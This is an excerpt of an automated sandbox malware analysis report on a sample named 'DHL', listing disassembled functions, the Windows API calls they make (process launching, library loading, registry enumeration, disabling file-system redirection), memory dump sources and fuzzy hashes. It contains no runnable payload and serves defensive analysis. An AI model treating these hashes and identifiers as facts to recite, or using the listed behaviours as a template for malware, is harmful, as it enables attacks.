                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 38ee2948ef8f1faff6606852f8ea731c516f300a2fa51cadd3908b05a8656270
                                                        • Instruction ID: 089a4777de07f89127d4131fb913b436d1115f196fa07cfd732802134edc3f0f
                                                        • Opcode Fuzzy Hash: 38ee2948ef8f1faff6606852f8ea731c516f300a2fa51cadd3908b05a8656270
                                                        • Instruction Fuzzy Hash: 1FF05E72240158BBE7219BA29C0EEEF7E7CEFCBB21F004158F601E1091D7A45A02D7B5
                                                        APIs
                                                        • GetClientRect.USER32(?), ref: 009F7452
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 009F7469
                                                        • GetWindowDC.USER32(?), ref: 009F7475
                                                        • GetPixel.GDI32(00000000,?,?), ref: 009F7484
                                                        • ReleaseDC.USER32(?,00000000), ref: 009F7496
                                                        • GetSysColor.USER32(00000005), ref: 009F74B0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                        • String ID:
                                                        • API String ID: 272304278-0
                                                        • Opcode ID: 81d9b3d3a3919f310e8495265aab18ea9d800a1d4b9a184660440fc4ba8c1b55
                                                        • Instruction ID: 857f6821581bf6d06b5662f21eee8b7092e1387f47be16a35d8ff85cf8c968e7
                                                        • Opcode Fuzzy Hash: 81d9b3d3a3919f310e8495265aab18ea9d800a1d4b9a184660440fc4ba8c1b55
                                                        • Instruction Fuzzy Hash: 77014B31400619EFEB519FE4DC0ABAABBB6FB04321F514564FA16A21B1CB351E52AB50
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A0187F
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00A0188B
                                                        • CloseHandle.KERNEL32(?), ref: 00A01894
                                                        • CloseHandle.KERNEL32(?), ref: 00A0189C
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A018A5
                                                        • HeapFree.KERNEL32(00000000), ref: 00A018AC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 4e7806e31044741af0454cc71cf22a335d402ca69a4659bfa971041083a87fe2
                                                        • Instruction ID: 2ae0c9f1f88aeeeb32bc6521781a37196769f5c2cf0e810972c63753889b299d
                                                        • Opcode Fuzzy Hash: 4e7806e31044741af0454cc71cf22a335d402ca69a4659bfa971041083a87fe2
                                                        • Instruction Fuzzy Hash: 7EE0C236004101BBDA419BE1ED0C90ABB29FB49B32B108220F225A5070CB329432EB50
                                                        APIs
                                                          • Part of subcall function 009A7620: _wcslen.LIBCMT ref: 009A7625
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A0C6EE
                                                        • _wcslen.LIBCMT ref: 00A0C735
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A0C79C
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A0C7CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                        • String ID: 0
                                                        • API String ID: 1227352736-4108050209
                                                        • Opcode ID: 125ba4b7520031109bbcc05879711db67e630b784eb1fd40292172f572be23ba
                                                        • Instruction ID: 0fe282626d3b6c78219cbc4d7ffed5ec49965e334bafde7c0c266445eebc071b
                                                        • Opcode Fuzzy Hash: 125ba4b7520031109bbcc05879711db67e630b784eb1fd40292172f572be23ba
                                                        • Instruction Fuzzy Hash: 0151AD716043089BD7659F28EC85B6A77E8AB89320F044B29F995E21E0DB64D9058B92
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00A2AEA3
                                                          • Part of subcall function 009A7620: _wcslen.LIBCMT ref: 009A7625
                                                        • GetProcessId.KERNEL32(00000000), ref: 00A2AF38
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A2AF67
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 146682121-1426351568
                                                        • Opcode ID: f390d3044f271b40505759d4425ee2e4898cc8634f140b64b8aecc72e6f3ffeb
                                                        • Instruction ID: 7c9411bc5e875c4d613bfc8e247d6633340baadb46d35d1c96151f05e57ea71e
                                                        • Opcode Fuzzy Hash: f390d3044f271b40505759d4425ee2e4898cc8634f140b64b8aecc72e6f3ffeb
                                                        • Instruction Fuzzy Hash: 7D718C71A00625DFCB14EF98D885A9EBBF0FF49310F0584A9E816AB352CB74ED45CB91
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A07206
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A0723C
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A0724D
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A072CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: 79ddfd3ad43377fb7c032437f3505139672630e3c5408311651b9722f9470a27
                                                        • Instruction ID: 0737f9648b5bc2464ecc471577623a30175fb81b328491a67709aa13d3ffcfa8
                                                        • Opcode Fuzzy Hash: 79ddfd3ad43377fb7c032437f3505139672630e3c5408311651b9722f9470a27
                                                        • Instruction Fuzzy Hash: 4B419171A04208EFDB15CF94D884ADE7BB9EF48310F1580A9BD059F28AD7B1ED41CBA0
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A33E35
                                                        • IsMenu.USER32(?), ref: 00A33E4A
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A33E92
                                                        • DrawMenuBar.USER32 ref: 00A33EA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert
                                                        • String ID: 0
                                                        • API String ID: 3076010158-4108050209
                                                        • Opcode ID: 4d22e3479acb8f6ff89175aa8f4c5f0231c364efa9e7186377c8c272c8908ef5
                                                        • Instruction ID: cd0e5de97af1e89d61fa01dfda6fb3ab18a34dd9b4bf41b0391a792e6da05d17
                                                        • Opcode Fuzzy Hash: 4d22e3479acb8f6ff89175aa8f4c5f0231c364efa9e7186377c8c272c8908ef5
                                                        • Instruction Fuzzy Hash: 2E414676A05209AFDF10DFA4D884AAABBF9FF49360F148129F905A7250D730AE45CF60
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A03CCA
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A01E66
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A01E79
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A01EA9
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 2081771294-1403004172
                                                        • Opcode ID: 7e31c26135f6ee6e742bf9f5a44bdd2946b9b00094cc6380a782bb69d4c5e94f
                                                        • Instruction ID: 61ce97899afb657eeea2bb22c5b1cf12aba84e79992ed89ef33da30c716834de
                                                        • Opcode Fuzzy Hash: 7e31c26135f6ee6e742bf9f5a44bdd2946b9b00094cc6380a782bb69d4c5e94f
                                                        • Instruction Fuzzy Hash: DB213B71A00108BFDB149BB4ED46DFFB7B9EF86360F144519F825A71E1DB38490A8760
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A32F8D
                                                        • LoadLibraryW.KERNEL32(?), ref: 00A32F94
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A32FA9
                                                        • DestroyWindow.USER32(?), ref: 00A32FB1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                        • String ID: SysAnimate32
                                                        • API String ID: 3529120543-1011021900
                                                        • Opcode ID: 72a723697e11ac8a00211411e6dff55c4982059f53cf1617bace0f03283122c1
                                                        • Instruction ID: b922fe7022db5f7aa252de46f12d6fc4c019aeae8771347ece4b2e0775a29241
                                                        • Opcode Fuzzy Hash: 72a723697e11ac8a00211411e6dff55c4982059f53cf1617bace0f03283122c1
                                                        • Instruction Fuzzy Hash: 1B219D72204205ABEB208FA4DC81FBB77BDEF99364F104618FA50E6190D771DCA19760
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009C4D1E,009D28E9,?,009C4CBE,009D28E9,00A688B8,0000000C,009C4E15,009D28E9,00000002), ref: 009C4D8D
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009C4DA0
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,009C4D1E,009D28E9,?,009C4CBE,009D28E9,00A688B8,0000000C,009C4E15,009D28E9,00000002,00000000), ref: 009C4DC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e5ba3f91e875f228b990a72ea54d30fa2e9f86aeb6b9944aa1cce419bb27ec13
                                                        • Instruction ID: 302c3adbdc7fc4d74cd69d685441e61dc9a4a283518c08588de146bce28eda0f
                                                        • Opcode Fuzzy Hash: e5ba3f91e875f228b990a72ea54d30fa2e9f86aeb6b9944aa1cce419bb27ec13
                                                        • Instruction Fuzzy Hash: 63F06235A40208BBDB119FD0DC49FADBFB9EF44761F0001A8F906B62A0CB746E41DB92
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009A4EDD,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E9C
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009A4EAE
                                                        • FreeLibrary.KERNEL32(00000000,?,?,009A4EDD,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4EC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-3689287502
                                                        • Opcode ID: 48e9fea7b742ae312d574a51bfd40597f8a913238f0e2b5f13b0665768684db2
                                                        • Instruction ID: e5e82de35d6696d418198740f2450adbb212334b08939da0d6fdbe7b54d4b056
                                                        • Opcode Fuzzy Hash: 48e9fea7b742ae312d574a51bfd40597f8a913238f0e2b5f13b0665768684db2
                                                        • Instruction Fuzzy Hash: 4CE08C36A026226BD2225B65AC18A6BA668AFC2F72B150215FC01F2200DBA4CD0392E0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009E3CDE,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E62
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009A4E74
                                                        • FreeLibrary.KERNEL32(00000000,?,?,009E3CDE,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E87
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 145871493-1355242751
                                                        • Opcode ID: 1c50385186adc417c2bc6f2d12c1544f94e88f34ef5d2ee41bdb92dc56ca5a01
                                                        • Instruction ID: 1963d28ca273e932ac31dd3a03d448bb38a3fcd2e9ce928437f1aa0bc6c8412c
                                                        • Opcode Fuzzy Hash: 1c50385186adc417c2bc6f2d12c1544f94e88f34ef5d2ee41bdb92dc56ca5a01
                                                        • Instruction Fuzzy Hash: E1D0123650262167DA225B657C18D8B6A5CBFC6F713150615B905F2154CFA4CD0296D1
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00A2A427
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A2A435
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A2A468
                                                        • CloseHandle.KERNEL32(?), ref: 00A2A63D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 3488606520-0
                                                        • Opcode ID: bedb2f30341c9aac9fdefc639a5a3c5937c47d01abe931a9f59f5512cf11cda7
                                                        • Instruction ID: 3227827e869522a33671c0a819c478d4bae2e289a8fe3be9727b78a33e9c2c31
                                                        • Opcode Fuzzy Hash: bedb2f30341c9aac9fdefc639a5a3c5937c47d01abe931a9f59f5512cf11cda7
                                                        • Instruction Fuzzy Hash: 25A181716043019FD720DF28D886F2AB7E5AF94714F14886DF99A9B2D2D770EC41CB92
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A43700), ref: 009DBB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00A7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009DBC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00A71270,000000FF,?,0000003F,00000000,?), ref: 009DBC36
                                                        • _free.LIBCMT ref: 009DBB7F
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009DBD4B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: 17d5a8af1fe2e0b9629b40a902907044b6934826e2ff51db93b7d84bf346742b
                                                        • Instruction ID: 66a6be7328cd054c78c3a6b72c6886fb1eab536f009c4667ee3f0498274973e0
                                                        • Opcode Fuzzy Hash: 17d5a8af1fe2e0b9629b40a902907044b6934826e2ff51db93b7d84bf346742b
                                                        • Instruction Fuzzy Hash: 4351A671940209EBCB10DFB99C81AAEB7FCFB84360B11C66BE554D7391EB709D419B90
                                                        APIs
                                                          • Part of subcall function 00A0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A0CF22,?), ref: 00A0DDFD
                                                          • Part of subcall function 00A0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A0CF22,?), ref: 00A0DE16
                                                          • Part of subcall function 00A0E199: GetFileAttributesW.KERNEL32(?,00A0CF95), ref: 00A0E19A
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A0E473
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A0E4AC
                                                        • _wcslen.LIBCMT ref: 00A0E5EB
                                                        • _wcslen.LIBCMT ref: 00A0E603
                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A0E650
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                        • String ID:
                                                        • API String ID: 3183298772-0
                                                        • Opcode ID: b15a8cfeb136077e4154b12581aba1639818b70eabb27285323dd69f99e1fd62
                                                        • Instruction ID: c1f37bff9647a7e34c22825b0301e260a6c61130a522f3129ebe2238d3832cbd
                                                        • Opcode Fuzzy Hash: b15a8cfeb136077e4154b12581aba1639818b70eabb27285323dd69f99e1fd62
                                                        • Instruction Fuzzy Hash: BF5150B24083495BC724EB94EC91ADBB3ECAF85350F004D1EF589D3191EF75A6888766
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                          • Part of subcall function 00A2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A2B6AE,?,?), ref: 00A2C9B5
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2C9F1
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA68
                                                          • Part of subcall function 00A2C998: _wcslen.LIBCMT ref: 00A2CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A2BAA5
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A2BB00
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A2BB63
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00A2BBA6
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A2BBB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
